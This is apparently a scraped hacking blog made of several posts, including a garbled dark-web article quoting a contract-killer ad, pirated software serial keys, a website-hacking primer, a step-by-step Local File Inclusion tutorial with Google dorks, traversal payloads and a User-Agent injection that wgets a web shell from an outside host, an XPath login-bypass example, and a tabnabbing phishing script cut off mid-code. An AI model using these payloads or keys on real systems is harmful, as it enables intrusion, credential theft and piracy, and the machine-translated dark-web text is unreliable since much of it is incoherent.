World Wide Web Top Secret !

Nice to meat all of them, I can not write I'm still a good bn. Forgiveness perspective view.

              I remember the scene where the Godfather holliwood  photo with her ​​pet murderer never face to face not meet the mandate through the network on the go with a very secret, or what are anjelina starring Julie 'Hacker' do not know the name of the movie is where the perpetrators of the crime within the network law and Order --- where they could not force the nose throat?

At first sight, the silver screen, but these movies are saiphai just false unknown networks like the Internet  is one of our known darkness ...

Promote excellence in information technology with the Internet, it has become the most mahasamudrera gets a big one. Keeping with the increased ability to search Engines. In particular, Google's name will be balatei, which is now one of the most trusted bryande been parinita. I think what we can suggest a net session without? Impossible!

But Google's ability to get this?

You'll be surprised to know that when you are no longer in the Google search results for hundreds of thousands of information you up before putting it on the Internet, only 10 per cent from! The Google of online information, 90 percent do not know! Eleme only 10 percent of the time within the search results that appear in front of the customer. The remaining 90 percent are unfamiliar to you always.

A survey has shown that the amount of data stored on the web than 500 times higher than the data stored in the invisible web. In fact, this is one part of the glacier is visible on the net is popped Ocean Deep Web is the real ocean itself!

Our topic today is unknown Black web

Black Web can be divided into two, which are

• 1. The Deep Web

• 2. The Dark Web

They are all part of the Deep Web is the Internet search engine to find, but if you know their address, you can go to this section.

The Dark Web is the part where conventional ways the Internet can not let you, you can not enter common Browsers. The software's help, you can enter here.

What is the origin of this part of the internet? It is impossible to correct it.

In fact, neither you nor I am not alone internet! Your every action, every glance watching your Internet Service provider download. They are no longer any need for your whole profile of the Secret Agency’s they Supply . This means you do not have freedom of movement no!

In the world of the Internet, the group felt the need for a system where they can secretly manage their activities. Army, the revolutionary, hackers, Actually real Administration wanted a system where the exchange of information between the Office of confidence or stolen information can get back to you chaffer with offenders. The world of online censorship many countries are very strict, Equally   Antiparty  been thinking about a system where the government can not administer. It would have been the origin of this is unknown. It all offenders who lure them with the fear of being caught in the nets do not dare discuss.

Now the question is why the Deep Web, search engines can not read?
This is because search Engines their search for the supervision of virtual robots with the Crawler. The Crawler is recorded on the website Websites  the HTML tag. Moreover, some of the requests are recorded from the site in search engines. Now that the site admin does not want to find that their site is not search engine rather, they use the Robot Exclusion Protocol, which entered Crawler or prevent them from existing sites to find. Some sites have a certain dynamic that is subject to the requirements of this type of site can be found to exist, the Crawler's possible this is not all. There are some sites that have links from other sites. The isolated site, also in the search.

Moreover, it could not leave the house search engine technology is still in its old. Text search Engines apart from the other formats (such as Flash format) webpage  not find!
The Deep Web data from the web surface quality of the information. These are very ornate and relevant. Understand what you are searching Engines!

The most interesting part of the Dark goodbye on the web ...
Your current web browser can not access these sites. They all practice outside of the Internet, it does not take into account any protocol. And they are so odd addresses (such as sdjsdhsjhsuyumnsdxkxcoioiydsu67686hsjdhjd.onion) that lay people are very difficult to remember. This site is the invisible part of the internet. Special knowledge (such as programming, networking, proxy) if you can not access this network. Another peculiarity of this part of the World Wide Web sites, such as top-level(TLD) domains (such as. Com) rather than using the "Pseudo Top Level Domain" using the original World Wide Web from a second network under. I have a domain of Bitnet, Onion, Freenet, and more.
Most of the world! I can not imagine life  which is what you get here. I did not ever imagine that it can be taken apart Secret Agency's site, so you are always here. The issue that you can get into your head. This year, WikiLeaks has announced that they will release more new data, but you might be able to post Surprised this all data from the Dark Web has a number of years ago. Any book is the latest edition to the surface of the web of copyright law, it's not because you are being transferred dedarase.

There are more depraved Entertainment! Child pornography from the surface of the Genital Mutilation's video on the web, and it is here Hot Topics.
There are some sites where marjuyana, Heroine from all kinds of home delivery of the drug. Dark web  users Are Adictted.
There are some sites where Criminal groups with education on how to make the pudding powder, some site arms are sold canned. It started from the rocket  Luncer, martar AK 47 like to buy the weapon.
Arabian - Democrate this spring darkweb join  them. Darkweb range of mail services, chat services, there is nothing much you can keep a secret identity.

Like, there's more! Several days ago I was visit on a site under equivalent kilar  where the money is available to rent! What's terrible, is not it? I was not. The site is the work of his own about the way I kilar On says
"I would call you up in slyat. I would not be able to offer the professional  end way. I know that I was not interested. You just give me the money and I will pay him that. Target age must be at least 18,
The target is male or girl that I can not come
I do not pregnant women as a target
I do not torture the target
If you're a member of a political personality or law enforcement agencies target the additional charge.
There is no extra charges for the fact that I am the sort of suicide or accident can.
After down pemment done within four weeks.
Outside the U.S. for target 5000 dollars extra travel charge applicable.
I work, I'll send you pictures of targets "
Black forest is the word you enter where you think twice before you take each step. Surface hacking technique that you see on the web is the dark part of the information from the web write by 1%. The hacker is terrible and Programming in a pair of them, and you can hack mail. Moreover, the government has Agents.

The question is how this all works with Network Law enforcement agencies continues to front of nose?
It is our understanding that such a network can be a little ...
The Network had become popular in the web dark web Surface Network is a onion Network. Pseudo-top-level-domain is onion.Onion. It's spooky sites address! Originally created for the U.S. Navy, but this was masked by the net users first choose Network. onion can not let your browser, you can download the Tor browser.
Torr to hide your identity, so this is what it will be almost impossible to identify your location. When you access a site with torr torr when you go through onion authenticated encryption difficult to send this request. The data you send to the proxy onion data, it becomes complicate the script.

The data in the original proxy onion like internet in which the members of Serve onion rautars waiting. Before entering the data again gateway onion networks get & IPsec encryption through it. Network time out once more through the encryption. onion way through several routers in IPsec encryption, encryption is where the output of one to one and a router knows that the data is coming from a router. Finally, when the data arrives in the recipient's hands go through the process dicription return to the original position. This is why many of the Network Layer, or Xhosa name onion Network.
Now, if this data is stolen during this data calacalira can not find it in his behalf or that of its sender or as receiver! I do not know it themselves onion rautar. But yes, there are two parts may be monitoring Sender-Receiver's location where he or she can understand.
This is why these kinds of mystical system of Law and Order List from the network all the time. Black is the most popular marketplace networks onion inside Silkroad, Forbes million sold as of last year there - was purchased. In currency trading is not common here, traffic is kind of virtual currency called Bitcoin. Microsoft, Apple products are found in 80% of discount.

This irregularities inside this kind of support system, why?
I really do not need to have an open platform. Child pornography that was created to lead this Network arekabhabe his work. And I always step ahead of cyber-terrorists from Service agencies. For example, we can say that Internet Protocol ^ 6 but have yet to surface on the web, the Internet Protocol ^ 4 at very old period. But probably the most under  using IP ^ 6.
Since internet user's people like Bad have all the time to adapt to it, it continues to be so. Once in a while I say that Dark web Visit on the web, but if you miss part of ice shelled sailer taste like the ocean.
If yes, do not go too far. I got, the plentiful money, so they need thousands of talented web Hacker Dark Dark hire people on the web, I was able to keep wait.
Some tips
• # The Dark web access on the Web, Flash, shock wave to spend about. Anonymity You can easily overturn them.
• # paid proxy service use. They are using military agencies and their services grating.
• # Destination Website if you are easily hacked, you could not leave a likely cause. What was your original data in the Dark Do not use the web.
Remember, you are not alone on web Dark of the Surface Web, the walls have ears ...... Welcome to the Dark on the web.

Read More

Free Internet Browsing and Download 100% By IDM !

Hello visitor,
Today i'll tel how to use free internet with IDM(Internet Download manager). Actually it is old method but 100% good Working.
Step 1:Download the Software
Step 2:Register your Software by using our serial
Step 3:Disconnect The Dial up Modem
Step 4:Start a Download link.Then Put username & passward is Waps press ok.

• Download From Softpedia
• Download From other server
• Download From other server
• Download From other server

Use our Serial Key

D60G8-Y85O8-B5YZV-U0PB3
AT6H7-TDK7X-YMB5W-QA809
DUJ7M-BBNR6-CML6I-9HVEY
U6JY7-O1C4Z-OPPJR-0JXHH
9QZWY-4AFHB-IPJ4T-RBJSE
D87W5-CKD63-RGUNI-X68EG 

Read More

Basic Ethical Hacking part 1

 Hack Website : Basic Information About Website Hacking Part 1
Well I have posted lots of articles on Email Hacking which includes Phishing and keylogging etc, but today I would like to throw some light on new topic which is "Website Hacking". Today i am first time writing article on "Website Hacking". why I am writing this article as there are lots of newbies having lots of misconceptions related hacking website, So I hope this tutorial cover all those misconception and if not all most of them.

Website security is a major problem today and should be a priority in any organization or a webmaster, Now a days Hackers are concentrating alot of their efforts to find holes in a web application, If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.

Few years back their existed no proper tools search for vulnerability, but now a days there are tons of tools available such as SQL Injection through which even a newbie can find a vulnerable site and start Hacking in just few minutes.

Basic Information About Website Hacking

What is a website hack?
The files of your website are stored on a computer somewhere. The computer, called a "server" or "web server", is not too much different from your home PC, except that its configuration is specialized for making files available to the world wide web, so it has a lot of hard drive capacity and a very high speed internet connection. It probably doesn't have its own monitor or keyboard because everyone who communicates with it does so through its internet connection, just like you do.

With everybody connecting to your site through the internet, it might seem like just an accident if one of your files gets changed once in a while in all the commotion, but it's not.

Your website and server have several security systems that determine what kind of access each person has. You are the owner, so you have passwords that give you read/write access to your site. You can view files (read) and you can also change them (write). Everybody else only has read access. They can view your files, but they are never, ever supposed to be able to change them, delete them, or add new ones.

A hack occurs when somebody gets through these security systems and obtains write access to your server, the same kind you have. Once they obtain that, they can change, add, or delete files however they want. If you can imagine someone breaking into your home and sitting down at your PC with a box of installation CD's, that's what a website hack is like. They might do only a little damage, or a lot. The choice is up to them.

People often ask, "But how could my page, which was 100% pure HTML, have been hacked?"

The answer is that the defacement of the page wasn't the hack. The hack was when they got write access to the server. The "pure HTML" page had nothing at all to do with that.

Altering the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING, including alter your pages that are pure HTML. That is the reason why, after a hack, the most important thing isn't repairing the damage they did (which most people focus on), but finding out how they got in.

Who are the hackers?

Website hacking is one of the modern enterprises of organized crime, but if you think that means it's being done amateurishly by a bunch of elderly mobsters who took night classes in Computer ABC's to learn what "this Internet Explore thing is", think again. These organizations have professional programmers. Their campaigns to take control of thousands of the world's computers are well planned and sophisticated, drawing on an in-depth knowledge of operating system software, browser vulnerabilities, programming, and even psychology, and their attacks are almost always automated.

Strangely enough, if your site was hacked, it probably wasn't done by a person, but by another computer, which was hacked by another computer, which was hacked by yet another, and somewhere way back in the chain is a programmer who initially unleashed the sequence of events that set all these computers to attacking each other and building a giant network, a "botnet", a massively parallel virtual supercomputer whose purpose is to suck up all of the world's information that the criminals can efficiently turn into money. They need to have as many computers as possible recruited into the enterprise, and that's why they wanted to hack your little website.

Other hackers do it, whether they realize it or not, as affiliates of organized crime. Using tools provided by the larger organization, they get a small commission ($5, last I heard) for each website they successfully break into.

And there are still hackers who are motivated by fun, challenge, and prestige among their peers or by the desire to deface the site of someone they dislike, but their numbers and impact today are dwarfed by the commercial robotic crawling operations.

Why do they do it? What do they want?

What they want is money. While you may be racking your brain and tearing your hair out trying to figure out how to monetize your website, these people already know just how to do it, and they have a plan, too. You can't use the same monetization methods they do because their methods are illegal!

To use your server to make money, in approximate order of decreasing value and decreasing incidence of occurrence, they want:

    Your visitors' confidential financial information. They want credit card and Social Security numbers, FTP passwords, website logins, and other information from the people who trustingly visit your site. Credit card numbers are sold in bulk to brokers who resell them. More complete financial information is used in identity theft schemes involving mortgages or car loans.
Theft methods:
        They install malicious content on your website so that your visitors are attacked with viruses, Trojans, keyloggers, and other spyware. Once on the PCs, the malware either searches for the data it wants, or keyloggers capture passwords as users log into their bank accounts. The stolen data is relayed to remote computers using the victim's internet connection. In spite of the availability of antivirus and antispyware software, many home PCs are still poorly protected, and one of the sophisticated attack packages (MPack) claims that it successfully infects 50% of the computers it attacks.
They copy your customer database.
        They install spyware or phishing pages in your site, to grab data as your customers log in. Use of your visitors' computers. When they got into your server, they took control of one computer, but now they can attack all your visitors, too, and maybe get hundreds or thousands of new zombie computers under their control. One of the things that makes your server an attractive target is the opportunity to attack all these poorly protected PC's.
Your mail server, for sending spam.
Your server's high-speed internet connection, for relaying stolen data, spamming, communicating with other sites in a botnet, crawling the web searching for new websites to victimize, and attacking them.
    Free use of your server's processing power, to reprogram however they want.
    Free use of your webspace, to host illegal content or even an entire illegal website. They avoid webhosting fees, electricity bills, and can engage in activities that no webhost would allow, leaving you with the worries about TOS violations and legal liability. Even after you clean up the site and remove the content, it may remain indexed by search engines for months.
    Examples:
        Phishing sites: they create a fake (spoof) site that looks like a popular one such as PayPal. Then they send spam emails containing links to the phishing page on your site. When victims log in, thinking it's PayPal, your site steals their login data and relays it to a remote computer. Then the thieves log into the real PayPal accounts and steal the money.
Illegal pornographic content.
        Use your web space to store PHP or Perl scripts like c99 or r57 for use in Remote File Inclusion (RFI) attacks on other sites, making your site look like the attacker.
    Your traffic. They put visible links on your pages that visitors on your site can follow. Or they install code to redirect all of your traffic to a different site. Either way, your visitors become their visitors.
    Your money, by extortion, threatening to launch a worse attack against your site if you don't pay them.
    Your PageRank. By putting invisible outbound links on your pages (so only search engines see them) they inflate another site's inbound links and boost its PageRank. Appearing higher in search results makes more money for them.
    Your advertising space. They monetize your popularity by inserting their ads onto your pages. Clicks are credited to them.

Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website but most common ones are as follows:

    SQL Injection
    Cross Site Scripting (XSS)
    Remote File Inclusion(RFI)
    Local File inclusion(LFI)
    Directory Traversal
    Cross-site request forgery( CSRF )
    SSI Injection
    LDAP Injection
    XPath Injection
    Denial of Service - DOS Attacks

In this article, I have just shared basic information on Hacking Website. I hope you have liked the post uptill now, I will cover the method to hack website in the next post, So stay tuned !.

Read More

Web site Hacking by Local File Inclusion (LFI)

In previous article we have discussed various website hacking tutorials like..How to find a vulnerable Website?, Basic information of website hacking, XSS Tutorial , (CSRF/XSRF) and Remote File Inclusion Tutorial.

In this tutorial I show you how to get a shell on websites using Local File Inclusion (LFI) vulnerabilities and injection malicious code in proc/self/environ.Is a step by step tutorial.
How To Hack Website Using Local File Inclusion(LFI)

Follow the following steps to hack website using LFI and upload shell on hacked website.
Step 1: Search For LFI vulnerable Sites?
Now we are going to find a Local File Inclusion vulnerable website using some Dorks.Search that Dorks in google, to get LFI vulnerable Sites.

    inurl:redirect.php?page=
    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
    inurl:/include/new-visitor.inc.php?lvc_include_dir=
    inurl:/_functions.php?prefix=
    inurl:/cpcommerce/_functions.php?prefix=
For more Dorks Visit here
Here i am using following google dork:

    inurl:redirect.php?page=

Search that in google, and you should come up with a link like this:

    www.website.com/view.php?page=contact.php

Step 2: Test Local File Inclusion vulnerability
Now lets replace contact.php with ../ so the URL will become

    www.website.com/view.php?page=../

and we got an error

    Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

Big chances to have a Local File Inclusion vulnerability.Let’s go to next step.

Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :
 www.website.com/view.php?page=../../../etc/passwd

We got error and no etc/passwd file

    Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up

    www.website.com/view.php?page=../../../../../etc/passwd

we successfully included the etc/passwd file.

    root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
Note :well if Local File Inclusion vulnerable site url is,

    www.site.com/test.php?main=lol.php

that means,

    PHP Code:
    include $main; 

so you cant go with it with any nullbyte

    ../../etc/passwd 

and if Local File Inclusion vulnerable site url like

    www.site.com/test.php?main=lol

well that means the include has .php with it as in

    PHP Code:
    include $main.'.php';

well actually we know that mean the .php comes to the end of it so we have to use the nullbyte for this one.

    ../etc/passwd

Step 3: Checking if proc/self/environ is accessible
Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ

    www.website.com/view.php?page=../../../../../proc/self/environ

If you get something like

    DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.
Step 4: Injecting malicious code
Now let’s inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :

    www.website.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in User-Agent filed write the following code :

    <?system(‘wget http://hack-bay.com/Shells/gny.txt -O shell.php’);?>

Then submit the request.
Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt and will save it as shell.php in the website directory) through system(), and our shell will be created.If don’t work,try exec() because system() can be disabled on the webserver from php.ini.
Step 5: Access our shell
Now lets check if our malicious code was successfully injected.Lets check if the shell is present.

    www.website.com/shell.php

Our shell is there.Injection was successfully.
So friends, I hope you will like this
Local File Inclusion Tutorial....
I have personally tested this Website Hacking Tutorial and found all are working. If you have any problem in above Website hacking Using Remote File Inclusion Tutorial, please mention it in comments section.

Read More

Xpath Injection Website Hacking Technic !

Everyday many website gets hacked by hackers but most of the hackers are hacking those website just for popularity nothing else. Today i am writing this tutorial on XPath Injection, in which i will explain you, How Hackers Hack Website Using XPath Injection.

In a typical Web Application architecture, all data is stored on a Database server. This Database server store data in various formats like an LDAP, XML or RDBMS database. The application queries the server and accesses the information based on the user input.

Normally attackers try to extract more information than allowed by manipulating or using the query with specially crafted inputs.Here, in this tutorial we’ll be discussing XPATH Injection techniques to extract data from XML databases.
Don’t forget to Subscribe to our RSS feed

XPath Injection Tutorial To Hack Websites Database

Before we go deeper into XPATH injection lets take a brief look at what XML and XPath.
What is XML?
XML stands for Extensible Markup Language and was designed or used to describe data. It provide platform for programmers to create their own customized tags to store data on database server. An XML document is mostly similar to an RDBMS Database except for the way data is stored in them. In case of a normal database, data is stored in a table rows and columns and in XML the data is stored in nodes in a tree form.
What is XPath?
XPath is a query language used to select data from XML data sources. It is increasingly common for web applications to use XML data files on the back-end, using XPath to perform queries much the same way SQL would be used against a relational database.
XPath injection, much like SQL injection, exists when a malicious user can insert arbitrary XPath code into form fields and URL query parameters in order to inject this code directly into the XPath query evaluation engine. Doing so would allow a malicious user to bypass authentication (if an XML-based authentication system is used) or to access restricted data from the XML data source.

Lets learn with the help of examples that will show how XPath works, Let's assume that our database is represented by the following XML file:

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <users>
    <user>
    <username>wildhacker</username>
    <password>123</password>
    <account>admin</account>
    </user>
    <user>
    <username>cutler</username>
    <password>jay</password>
    <account>guest</account>
    </user>
    <user>
    <username>ronie</username>
    <password>coleman</password>
    <account>guest</account>
    </user>
    </users>


The above code show how username,password and user account details stored in XML file.

Following XPath query is used to returns the account whose username is "wildhacker" and the password is "123" : ,

    string(//user[username/text()='gandalf' and password/text()='!c3']/account/text())


If the application developer does not properly filter user input, the tester or hacker will be easily able to inject XPath code and interfere with the query result. For instance, the hacker or tester could input the following values:

    Username: ' or '1' = '1
    Password: ' or '1' = '1


Using these above parameters, the query becomes:

    string(//user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1']/account/text())


As in most of the common SQL Injection attack, we have created a query that always evaluates to true, which means that the application will authenticate the user even if a username or a password have not been provided.

And as in a common SQL Injection attack, with XPath injection, the first step is to insert a single quote (') in the field to be tested, introducing a syntax error in the query, and to check whether the application returns an error message.

If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack(i will explain that in next tutorials), whose goal is to reconstruct the whole data structure. The technique is similar to inference based SQL Injection, as the approach is to inject code that creates a query that returns one bit of information.

That’s it.

So friends, I hope you will like this

Read More

How To make your own Radio Station ...

Hello Visitor

                     Today I will How to How To make your own Radio Station .U must do it Absolutely Free and Safely.Must HAVE Winamp (Require 5.5 Or Updated )

First, things First your speed has to be at least 256/64 kbps (which means Dial-up users, will have alot of latency, just dnt bother)

Second, your going to have to have a domain, an updated one with the current i.p active. (Could be anything e.g. My sig)

Now, Your gonna have to download the Shoutcast Files.

Go to
www.shoutcast.com

to get the files.Or Download Hare 3 Software File-1 , File-2 and File-3

Ok After downloading these, installing Both of them in any order i dnt care. Go to START>PROGRAM FILES>SHOUTcast DNAS>EDIT SHOUTCAST DNS CONFIG.
Ok your gonna have to Configure it:
Go Down and where it says password: change (that means your gonna have to change it to whatever, make sure u remember)

The Portbase: change it to whatever port you want it
Maxusers: (lets be realistic here, dnt put in 10000, like NXS's radio station) your bandwidth has to be extremely good, if your cable, 50 user max is ok, ADSL should stay below 10 users, and T1 connections should do whatever tickles there fantasy.

EDIT>SAVE.

Open winamp, RIGHT CLICK>OPTIONS>PREFRENCES>DSP EFFECT> and choose the NULLSOFT SHOUTCAST.

Go to OUTPUT, and then click on Connection, Through the ADDRESS, type your address which you have done through
Code:www.no-ip.com

PORT NUMBER, whatever u did in the EDIT.txt, and your password.

Then go to Encoder, and choose your quality of your music. Go back to OUTPUT>OUTPUT CONFIG> YELLOW PAGES. this is your advertisemant information. dow hatever you like there.

Now Connect. to check that your Radio os on-line go to http://yoursite.com (your address that you added in the prefrence).That's it.

Read More

IP Address Structure Introduction !

Hello Visitor,
                     Today I'll Explain Introduction Of IP Address(Internet Protocol address).Every station on a PSN (packet switched network) that is based on the TCP/IP protocol (your computer is one, for example. Yes, we're referring to a host that is connected to the net) must have an IP address, so it can be identified,and information can be relayed and routed to it in an orderly fashion.An IP address consists of a 32 bit logical address. The address is divided
into two fields:
1) The network address:
Assigned by InterNIC (Internet Network Information Center).
In fact most ISPs (internet service providers) purchase a number of addresses
and assign them individually.
2) The host address:
An address that identifies the single nodes throughout the network. It can be assigned
by the network manager, by using protocols for it such as DHCP, or the workstation itself.
The IP networking protocol is a logically routed protocol, meaning that address 192.43.54.2
will be on the same physical wire as address 192.43.54.3 (of course this is not always true. It depends on the subnet mask of the network, but all of that can fill a text of its own)
IP address structure:
Every " --- " = 8 bits.
The first bits ===> network address
The last bits  ===> host address.
with 8 bits you can present from 0-255 . (binary=(2 to the power of 8)-1)

Example:
11000010.01011010.00011111.01001010 (binary)
194.90.31.74 (decimal)
IP address CLASSES :
We can classify IP addreses to 5 groups. You can distinguish them by comparing the "High Order" bits (the first four bits on the
left of the address):

type  | model  | target | MSB |addr.range    |bit number| max.stations|
     |        | groups |     |              |net./hosts|             |
------|--------|--------|-----|--------------|----------|-------------|
 A   |N.h.h.h | ALL    |  0  | 1.0.0.0      |   24/7   | 16,777,214  |
     |        | ACCEPT |     |    to        |          |             |
     |        | HUGE   |     | 127.0.0.0    |          |             |
     |        | CORPS  |     |              |          |             |
-----------------------------------------------------------------------
     |N.N.h.h | TO ALL | 10  | 128.1.00     | 16/14    | 65,543      |
 B   |        | LARGE  |     |    to        |          |             |
     |        | CORPS  |     | 191.254.00   |          |             |
-----------------------------------------------------------------------
     |N.N.N.h |TO ALOT | 110 | 192.0.1.0    | 8/22     |  254        |
 C   |        |OF      |     |    to        |          |             |
     |        |SMALL   |     | 223.225.254  |          |             |
     |        |CORPS   |     |              |          |             |
-----------------------------------------------------------------------
D    | NONE   |MULTI-CA|1110 | 224.0.0.0     | NOT FOR |   UNKNOWN   |
     |        |ST ADDR.|     |    to         | USUAL   |             |
     |        |RFC-1112|     |239.255.255.255| USE     |             |
-----------------------------------------------------------------------
E    | NOT FOR|EXPERIME|1,1,1,1| 240.0.0.0     |NOT FOR|  NOT FOR USE|
     |  USE   |NTAL    |       |   to          |USE    |             |
     |        |ADDR.   |       |254.255.255.255|       |             |
-----------------------------------------------------------------------

N=NETWORK , h=HOST .

Notice the address range 127.X.X.X.
These addresses are assigned to internal use to the network device, and are
used as an application tool only. For example: 127.0.0.1, the most common one,
is called the loop-back address - everything sent here goes directly back to
you, without even traveling out on the wire.
Also, some IPs are reserved for VPNs - Virtual Private Networks. These are
local area networks over wide area networks that use the Internet Protocol to
communicate, and each computer inside the network is assigned with an IP
address. So, suppose a certain computer wants to send a data packet to
another host on the network with the IP 'x', but there's also another host on
the Internet that has the same IP - what happens now? So this is why you
cannot use these and other forms of reserved IPs on the Internet.
EXTRA:Distinguishing different groups:

You have to compare the first byte on the left in the address as follows:


Type |    First byte  | MSB
    |    in decimal  |
----------------------------
A    | 1-127          | 0
----------------------------
B    | 128-191        | 10
----------------------------
C    | 192-223        | 110
----------------------------
D    | 224-239        | 1110
----------------------------
E    | 240-254        | 1111
----------------------------
NOTES: Yes, we know, we've left A LOT of things unexplained in this text.
With time, we will write more tutorials to cover these and other subjects. So
in the meantime, I suggest that you go to http://blacksun.box.sk, find the
tutorials page and see if there's anything else that's interesting to you.
And remember - we also have a message board, so if you have any questions,
feel free to post them there.
1) Multicast: (copied from RFC 1112)
  IP multicasting is the transmission of an IP datagram to a "host
  group", a set of zero or more hosts identified by a single IP
  destination address.  A multicast datagram is delivered to all
  members of its destination host group with the same "best-efforts"
  reliability as regular unicast IP datagrams, i.e., the datagram is
  not guaranteed to arrive intact at all members of the destination
  group or in the same order relative to other daiagrams.

  The membership of a host group is dynamic; that is, hosts may join
  and leave groups at any time.  There is no restriction on the
  location or number of members in a host group.  A host may be a
  member of more than one group at a time.  A host need not be a member
  of a group to send datagrams to it.

  A host group may be permanent or transient.  A permanent group has a
  well-known, administratively assigned IP address.  It is the address,
  not the membership of the group, that is permanent; at any time a
  permanent group may have any number of members, even zero.  Those IP
  multicast addresses that are not reserved for permanent groups are
  available for dynamic assignment to transient groups which exist only
  as long as they have members.
  Internetwork forwarding of IP multicast datagrams(ip packets)is handled by
  "multicast routers" which may be co-resident with, or separate from,
  internet gateways.  A host transmits an IP multicast datagram as a
  local network multicast which reaches all immediately-neighboring
  members of the destination host group.  If the datagram has an IP
  time-to-live greater than 1, the multicast router(s) attached to the
  local network take responsibility for forwarding it towards all other
  networks that have members of the destination group.  On those other
  member networks that are reachable within the IP time-to-live, an
  attached multicast router completes delivery by transmitting the
  datagram(ip packet) as a local multicast.
  *if you donot understand the above do not worry, it is complicated and dry
  but reread it and read it again get a dictionary if it helps.
  Hacking is not easy.
2) MSB: Most Significent Bit:
  In set numbers the first number on the left is the most important because it
  holds the highest value as opposed to the LSB=> least significent bit, it
  always holds the the smallest value.

Read More

The Advance Hacking TabNabbing !

Hello Visitor,

                     Today I will explain this tutorial  using attack scenario and live example and how to protect yourself from such stuff.
Let consider a attack scenario:
1. A hacker say(me Sajal) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)
2. I (Sajal) sends a copy of this web page to victim whose account or whatever i want to hack.
3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.
4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.
5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.
6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.
Here end's the attack scenario for advanced tabnabbing.

Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.

Follow below measure to protect yourself from Tabnabbing:
1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.
2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.
4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.

That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..

Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.

First sample code for doing tabnabbing with the help of iframes:


<!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: De$trUcTiVe M!ND (passward@2daymail.co.cc)
Website: http://www.bdcyberarmy.tk
Version:1.6
-->

<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>

<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
